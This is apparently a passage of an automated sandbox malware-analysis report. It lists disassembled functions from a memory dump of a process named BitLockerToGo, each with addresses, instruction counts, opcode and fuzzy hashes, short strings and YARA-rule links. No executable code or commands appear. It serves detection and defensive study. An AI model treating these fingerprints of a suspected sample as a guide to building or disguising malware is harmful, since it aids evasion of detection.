API String ID: 0-2044720025
Opcode ID: e57b985941f8f41b52dac0972862dc6c8c12ba97f213f5c7ea2f5137ead08018
Instruction ID: d56b0935d1e38cb2cfc5b676cae9c25b7e04ccf4ff07910b3d5f19706e0468f1
Opcode Fuzzy Hash: e57b985941f8f41b52dac0972862dc6c8c12ba97f213f5c7ea2f5137ead08018
Instruction Fuzzy Hash: 4D71C171A083418FC718CF29C49426BBBE2AFD5358F18C92EE4D5673D1C7789905CB86

Function 0044BCE0 Relevance: 1.4, Strings: 1, Instructions: 194COMMON

Download Yara Rule

Strings

ejkh, xrefs: 0044BDB3, 0044BDBB

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ejkh
API String ID: 0-2912734685
Opcode ID: 478501a756990d4fcca0358fe24b37eab84eb92c4ba219a4f6b6da61f4f9f1b9
Instruction ID: 83fc2a5d5017d6589403b61689d45348e967d71163ca17a1ad693a2bd1167b11
Opcode Fuzzy Hash: 478501a756990d4fcca0358fe24b37eab84eb92c4ba219a4f6b6da61f4f9f1b9
Instruction Fuzzy Hash: D65146316082446BE7149E1D8C90B2FB7E6EBC5314F28862DFAD953392C739EC1087DA

Function 0044D9A0 Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

75, xrefs: 0044D9D3, 0044D9DB

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 75
API String ID: 0-4276045302
Opcode ID: eddb7c4d6b7eeee85dc39d946ac84597fb1db8ae5d00fb977544cc451f027ae3
Instruction ID: cda361788ce1f4c3f3dd9c18ccbefc5c21216535f0b767c4284f229a0dd132ea
Opcode Fuzzy Hash: eddb7c4d6b7eeee85dc39d946ac84597fb1db8ae5d00fb977544cc451f027ae3
Instruction Fuzzy Hash: 7641AC3560C390DFE704DF28D89462ABBE1EF4A305F494C6DE4C687252D33AD810CB16

Function 0044E1B0 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

7654, xrefs: 0044E293, 0044E29B

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 7654
API String ID: 0-4024152101
Opcode ID: fc249f7cee3233b02cb88394e9b978ba2998dceb57a9c50197505e123b8c6652
Instruction ID: 8dc3960b3ca44632accddbbe023787d9bac4b1cc93a12cd8fc1d9ca51c8e04ad
Opcode Fuzzy Hash: fc249f7cee3233b02cb88394e9b978ba2998dceb57a9c50197505e123b8c6652
Instruction Fuzzy Hash: AE419D34208300ABF7159F5AD880F2FB7EAFB85714F14486EE98997391D379EC109B5A

Function 0044E330 Relevance: 1.4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

Strings

7654, xrefs: 0044E413, 0044E41B

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 7654
API String ID: 0-4024152101
Opcode ID: aebace1658a32aac2740e2f0623c3ca9fe8dbce1f051051899be1a4ba7a73644
Instruction ID: 926ac515e02a03d57c6024b080daf82d7c5c61681d479d7664e8cac25aae1922
Opcode Fuzzy Hash: aebace1658a32aac2740e2f0623c3ca9fe8dbce1f051051899be1a4ba7a73644
Instruction Fuzzy Hash: 67418E34208300ABE7219F56D880F2FB7E6FB85714F14892DE98997392D339EC118B5B

Function 00412420 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

wdyk, xrefs: 00412421

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: wdyk
API String ID: 0-3169803946
Opcode ID: 1603ebff207e9ce6081b4ed7972e2e56549ca19cbab6759538597cb00e503f15
Instruction ID: 3e14a2d74e336f086b7e605676ff8c627a6240dd7dc0edffbad2f00529b0c5c7
Opcode Fuzzy Hash: 1603ebff207e9ce6081b4ed7972e2e56549ca19cbab6759538597cb00e503f15
Instruction Fuzzy Hash: 8E315C73E2AD2007A35CDC3E8C11227B9D39BD6730B2EC76D7AB6D72E8DA7489110244

Function 004347D0 Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

rG9, xrefs: 004347F5

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: rG9
API String ID: 0-232284951
Opcode ID: 03497a29833569bf6860ab7c7e77e8de930c43d57201a74e3b12e9287b25b688
Instruction ID: 3063115916228b3127a3b1b0d6cb8e30dccd681ee40a93466bf70155a19bc1fc
Opcode Fuzzy Hash: 03497a29833569bf6860ab7c7e77e8de930c43d57201a74e3b12e9287b25b688
Instruction Fuzzy Hash: 6B312E73E21D300B9358DC7D8C15266A9D36BC6730B2AC73AADB5E72E4DA788D024280

Function 0040BA00 Relevance: .8, Instructions: 781COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac45b72513e74edaeb84960e47a139112009dd222f64d33ebf786ebe87b70b95
Instruction ID: a10061c2c24316a4c96f0586641130e1be87e176453182ce8e8f092ed672be96
Opcode Fuzzy Hash: ac45b72513e74edaeb84960e47a139112009dd222f64d33ebf786ebe87b70b95
Instruction Fuzzy Hash: FA42D431608711CBC724DF18D88166BB3E2FFC4314F298A3ED995A7395D739A851CB8A

Function 0040AEF0 Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86e853b62e0c5a9b1b6742f23a2055f17ca6fe7c399acde59fdf0b9094086848
Instruction ID: 6d6f111ab0a78e4e20b3cba62a90b281e653e516c2060a02772ef6d18561e354
Opcode Fuzzy Hash: 86e853b62e0c5a9b1b6742f23a2055f17ca6fe7c399acde59fdf0b9094086848
Instruction Fuzzy Hash: 94529FB0908B888EE7358B24C4947A7BBE1EB91314F14493EC5E617BC2D37DA885C79D

Function 00406E90 Relevance: .7, Instructions: 657COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39c36bf3ed7537e5809ca95867e70b8abc878e6d1a5904689bc75bfdbd402c75
Instruction ID: a1ef68b6ad6e5b0f013bd6abbe99aa6cd1cc39d4d264feae18ea9a5fc8c9cf7a
Opcode Fuzzy Hash: 39c36bf3ed7537e5809ca95867e70b8abc878e6d1a5904689bc75bfdbd402c75
Instruction Fuzzy Hash: BF52B33190C3458FCB15CF14C0906AABBE1FF89314F198A7EE89967391D779E849CB86

Function 00407890 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be8721940e07b1fec2c02ad1ce92207702ff250c74a7268f2086d14f0c1434f9
Instruction ID: 1a1a7515ca552a3d0de00da2c63b3e36fa9b2bcdc10c8c0f46cd5793d08974d3
Opcode Fuzzy Hash: be8721940e07b1fec2c02ad1ce92207702ff250c74a7268f2086d14f0c1434f9
Instruction Fuzzy Hash: F0323570919B118FC328CF29C69052ABBF1BF45310B604A2ED69797F90D33AF841CB5A

Function 0041698C Relevance: .5, Instructions: 545COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5251120f319edaf19edb643d4e8478ce95c20368b7451f7536779d37304350bf
Instruction ID: d347da7666984ac760adbcf38b9bb38ba8ae87c1d67ad10f1aa2b05f0ca68707
Opcode Fuzzy Hash: 5251120f319edaf19edb643d4e8478ce95c20368b7451f7536779d37304350bf
Instruction Fuzzy Hash: CC1201B4508380ABD300DB64D984B5FFBE5EF86708F448D2EF48997252E379D848DB5A

Function 00408C9E Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a74f345aff3fc918a4d100df2988a5634fc31a5ae9928aeb974eb1f2823db2a2
Instruction ID: 00ba9dd85aedf32607a5995ea8c480d6ddc0a6da32d572cadc3ff563069866a2
Opcode Fuzzy Hash: a74f345aff3fc918a4d100df2988a5634fc31a5ae9928aeb974eb1f2823db2a2
Instruction Fuzzy Hash: 10029A34200701CFD718CF29D990B96B7E2FB88346F09897DD8468B7A2D779EA95CB44

Function 00409E80 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 086f3127243528f81d480b01403253ccecab036a89c0a46ae15d32c98f765c37
Instruction ID: 61b60ad3537558cbf794e58876b260a7dd098b52f6f7247d0a771be577855436
Opcode Fuzzy Hash: 086f3127243528f81d480b01403253ccecab036a89c0a46ae15d32c98f765c37
Instruction Fuzzy Hash: BCF1E2356083418FC724CF29C88166BFBE2BFD9304F08892DE9D597791E679E844CB56

Function 0042A5E8 Relevance: .4, Instructions: 397COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b60f76de7f7f7cf504ccd2b52b64c8d7b4e801794e14960946f0082783887582
Instruction ID: 4400c795bca178a67067bf5f4869fe3d9a74a81b3acecafebbc75e28fa232165
Opcode Fuzzy Hash: b60f76de7f7f7cf504ccd2b52b64c8d7b4e801794e14960946f0082783887582
Instruction Fuzzy Hash: 04E1D070608302DFD304DF18E891A2AB3F5FF89316F45887DE88597252E738E961CB5A

Function 0044C2A0 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b26ac8ad0b7f487edb6572357a87c4894e60ecd423a78434571e77f328cbe7bc
Instruction ID: b1c9ee90fc34205af9916e09460339dfc39ec41cf97d0aa1008a47567118f914
Opcode Fuzzy Hash: b26ac8ad0b7f487edb6572357a87c4894e60ecd423a78434571e77f328cbe7bc
Instruction Fuzzy Hash: A7A10471A093509BF7509F29CCD572FB7E5EB85318F08492EE99487382E739EC04879A

Function 0040AA60 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7a53ce4266fc4d90f5cabf86e594608f22a99ba2c9a8f126733e5a3d9513d03
Instruction ID: a8563192bfee8285454794320277441a94df1d946628b9b8dfab2ff669f3aaa3
Opcode Fuzzy Hash: a7a53ce4266fc4d90f5cabf86e594608f22a99ba2c9a8f126733e5a3d9513d03
Instruction Fuzzy Hash: 81C16CB2A487418FC360CF68CC96B9BB7E1BF85318F08492DD199D7342E778A155CB4A

Function 004092F2 Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cd95630ae5004a85efd474f8c1fc2432aa3bc4ea784c1a9b09e7d907838a9c7
Instruction ID: c892b42d2e7f8579b506b9b6bbd74997b28e9676db8b39f7f8fe0c3cec1f7f5d
Opcode Fuzzy Hash: 9cd95630ae5004a85efd474f8c1fc2432aa3bc4ea784c1a9b09e7d907838a9c7
Instruction Fuzzy Hash: F4E11F75204700DFC764CF28D990A46BBF1BF18301F0489ACE98A8BB62D335EA55CF90

Function 0043099E Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ce22e09b7f1bd24892b746c9d0ae898b4a94b77ec885e8a2719e050c686325b
Instruction ID: e1c7dc83000dc660501cd449bbea6bbb53807fbd1fb24007ea606c0059cb1771
Opcode Fuzzy Hash: 1ce22e09b7f1bd24892b746c9d0ae898b4a94b77ec885e8a2719e050c686325b
Instruction Fuzzy Hash: FE9127B19087158FD319DF29D86073BB7E1BBC9304F49862DE8968B392DB74E814CB85

Function 0041FF04 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bc3e2d43e8068a180b3ea436baeadf92c0bbba2b400ff5c72543f06b4804ee4
Instruction ID: 5a7610ad83ead39fbd5b2c89cf52b26126d398024b1530059cbea3f463d7259d
Opcode Fuzzy Hash: 7bc3e2d43e8068a180b3ea436baeadf92c0bbba2b400ff5c72543f06b4804ee4
Instruction Fuzzy Hash: BEC187702083909FE731CF15D884BABBBE6FFC9744F94481EE8898B242D7399911CB56

Function 00448BF0 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7574124c7429e4b08d871520b832357b1a0d4e3c923dfa5b9a424911090b4276
Instruction ID: 83aa0ecc153a85115386ac90e50c5f634b9764e12e35a6bea78bcb65c119ba3c
Opcode Fuzzy Hash: 7574124c7429e4b08d871520b832357b1a0d4e3c923dfa5b9a424911090b4276
Instruction Fuzzy Hash: 2581DF71A093409BE714DF19C880B2FB7E2EBD5314F288A1EE5D987391DB399C11CB5A

Function 0043A1A0 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c488f66e142a0824e39aa4ce27406c3aa7794e80ed707b168f45154df115a483
Instruction ID: 7aeae85652ed96b500d0b48024a1f3415e89d0799e00388f1bb8434383a4e0ba
Opcode Fuzzy Hash: c488f66e142a0824e39aa4ce27406c3aa7794e80ed707b168f45154df115a483
Instruction Fuzzy Hash: 35712733A956904BC7208D3C4C452AAAA531BEB334F3E9367DCF48B3E1C56A8D124396

Function 0043BC30 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9602e6964b20f61284fc40041068862029954471e895789f825ec337096af7b0
Instruction ID: 1b089f59293fadc15111ee3107fc010ae3c16394f1f31d77f2ce92031dee3734
Opcode Fuzzy Hash: 9602e6964b20f61284fc40041068862029954471e895789f825ec337096af7b0
Instruction Fuzzy Hash: 6951EB3770968147D7105D3C4C513A95B539BDA374F3E936BDA718B3E1CA39C9028395

Function 00441DA0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcd73cd28c94833bda9f1839a6c8dbf540af69cb02dbbef0d96fd7892057b4bd
Instruction ID: c2ac1138eaab847e7fdb730883a44d5aecd4471bc04323151fee1e2c605e89ab
Opcode Fuzzy Hash: bcd73cd28c94833bda9f1839a6c8dbf540af69cb02dbbef0d96fd7892057b4bd
Instruction Fuzzy Hash: 47516CB16087548FE314DF69D49435BBBE1BBC8318F044E2EE5E987350E379DA488B86

Function 004479D0 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 454895afc15326784fbb8c26bdf1c69284fbd6459ff70c86190a9e2310c2668f
Instruction ID: c7662c76ce6969bc0e3359717d606e211b1ccbc9c3a40a3953525218483804be
Opcode Fuzzy Hash: 454895afc15326784fbb8c26bdf1c69284fbd6459ff70c86190a9e2310c2668f
Instruction Fuzzy Hash: 8A51917060D3409BE7249F19D890A2FB7E6EF85309F14882EE4C997351D339ED12DB6A

Function 004137B2 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f398e1df284fd230816b196cc7109d2bb5e1f26312dc410db4bc85eefde26ab
Instruction ID: 2b397681770352464ebcd57357ab75d495f2443823e07dbe33e5eeaf1da25acf
Opcode Fuzzy Hash: 3f398e1df284fd230816b196cc7109d2bb5e1f26312dc410db4bc85eefde26ab
Instruction Fuzzy Hash: 5E514CB4508240ABD305EF58C880A6AFBF6EF95706F188C1EE0D497361D339D9A1CB5B

Function 00405630 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d7ee6c60986ff8400cb67076ff3a97d3de81203b0f1d17211ea3f1d879998a1
Instruction ID: 39646fe9160c646b416d7a69dbb3b5d7e95d16d917b55dba00b33214a9dd78c6
Opcode Fuzzy Hash: 8d7ee6c60986ff8400cb67076ff3a97d3de81203b0f1d17211ea3f1d879998a1
Instruction Fuzzy Hash: 0251F1B5A047009FC710EF18C880927B7A5FF89324F158A7DE859AB392D635EC51CF9A

Function 0044B590 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7add998c5de4544a295390f8e921a5fed22f5d70fa22bc6f8fdb816c651cafe2
Instruction ID: 7eb353a6a42722f7c070372678f90f12bc4d5a03e7fea96ac46b55d6bf8e7092
Opcode Fuzzy Hash: 7add998c5de4544a295390f8e921a5fed22f5d70fa22bc6f8fdb816c651cafe2
Instruction Fuzzy Hash: B2519EB6518354DFC304DF28E890816B3F5FB8C312B0689BDE99097262DB35E921CF45

Function 00426D50 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 685c524026fb6c21a468075798cc769cbffcd9af060bc9fae8a4f2515e11d0ee
Instruction ID: d771abc8b8d49481eeb912efd69a8174b216b99214fcfe306f193d1ddd5a0aa1
Opcode Fuzzy Hash: 685c524026fb6c21a468075798cc769cbffcd9af060bc9fae8a4f2515e11d0ee
Instruction Fuzzy Hash: CB5132B05083909BC310DF15D581A2FBBF1EFA6B58F919A0DF4D49B261E338C941CB9A

Function 004162A7 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f75d6744867afdb155228176126d308f800338cf79a77a8eb76fa7cb12ae9b87
Instruction ID: ab1496675708a746405259833b1ac15a18543f4ce6b1416d2df58b00625e935d
Opcode Fuzzy Hash: f75d6744867afdb155228176126d308f800338cf79a77a8eb76fa7cb12ae9b87
Instruction Fuzzy Hash: 12417E728083919BD700EF58C84056BF7F5BF85319F190D2EF89597292E7B8E884CB5A

Function 00413671 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4fda55f19b9a24346301e393efd4e45142358a7fcdbae9507e8af121d9f41cd5
Instruction ID: 2b9da05fd11925e0c37a74c927343a53da3c2ca8502456ced1f599fcea4ba374
Opcode Fuzzy Hash: 4fda55f19b9a24346301e393efd4e45142358a7fcdbae9507e8af121d9f41cd5
Instruction Fuzzy Hash: E441D2B4509240AFE711AF58C88096ABBF2FB56306F54881AE0D4C7352D339D9A1CB5B

Function 00411810 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b0254707653142e58d878a6b68d9113dc18b925a8d06ea826662cd7b698e78a
Instruction ID: 2e86cbc4c39cba60680f81f45f6408c137d1e3b2bf0633b366af5f96e04b76fe
Opcode Fuzzy Hash: 1b0254707653142e58d878a6b68d9113dc18b925a8d06ea826662cd7b698e78a
Instruction Fuzzy Hash: 6441F6726182514BD70C9B39886027ABBD2AFC5350F19CA3EF0E6C73E1D638C945DB55

Function 00440370 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beb524b3bba1f251da7fc3a8ebd04c96236fdaeac5f43464323c5aead8674684
Instruction ID: 0b1d01a2934fd260d0b1b7c3581d6613027a6969e419a8d04bdcf523ee906da5
Opcode Fuzzy Hash: beb524b3bba1f251da7fc3a8ebd04c96236fdaeac5f43464323c5aead8674684
Instruction Fuzzy Hash: 08313B73A25D200B9718DD7E8C11267B9C39BC6734B2ACB2D7AB9D72E4DA788D110284

Function 004404C0 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b1e0da414a427207e58fdd4238f749c51306725ad3b3efd1c7b3805abbaa9ba
Instruction ID: 978eecc8b1d454c32ddbdbe5f6db9b5a590231843b79e6ab036bb8a02d15b1ee
Opcode Fuzzy Hash: 2b1e0da414a427207e58fdd4238f749c51306725ad3b3efd1c7b3805abbaa9ba
Instruction Fuzzy Hash: 8331A373E26E200BD3189D7D8C11266B9C29BD6730F2F877D7DB6E72E1DA688D110284

Function 00449FE0 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13231e69ddf7ada0b6a4107d06af0ef3c03c4968ad40c1b3c0048bb075bd04a1
Instruction ID: 2c41ff29d87bde8ebe4986f01b6f96b9ebec3e14c3d4c8a6c02f4d76b33beedd
Opcode Fuzzy Hash: 13231e69ddf7ada0b6a4107d06af0ef3c03c4968ad40c1b3c0048bb075bd04a1
Instruction Fuzzy Hash: 0B319E73F29E140B5308ACBE8C5216BBAD34BD6334B2DC77E6A75CB2E5D678C8114294

Function 0043F460 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b715c66fd1fc86683d454b9006a63e78e90f96669ebb88b90293ba7e961c672
Instruction ID: 28483c26a11d8e514fc5fd2378537fb9da2208b5468be17e34ad246787aee434
Opcode Fuzzy Hash: 3b715c66fd1fc86683d454b9006a63e78e90f96669ebb88b90293ba7e961c672
Instruction Fuzzy Hash: EF316073E65D200B9348C97D8C527677DC29BC6730F2A873E7ABAD72E4CA6889114684

Function 0040E700 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bafefb1cb60d4b315853d2e879dba5e1c973be328d516d2f0a6d12d086677e78
Instruction ID: 0fa81ff1aa803e44af21f80ecca48654c121c1d0a99f635823130dafdacc90b4
Opcode Fuzzy Hash: bafefb1cb60d4b315853d2e879dba5e1c973be328d516d2f0a6d12d086677e78
Instruction Fuzzy Hash: 83317C73E659600B9318DC7D8C41256A9C35BC6330B2AC7397DB4E73E4EA78CD124280

Function 0042E2B0 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

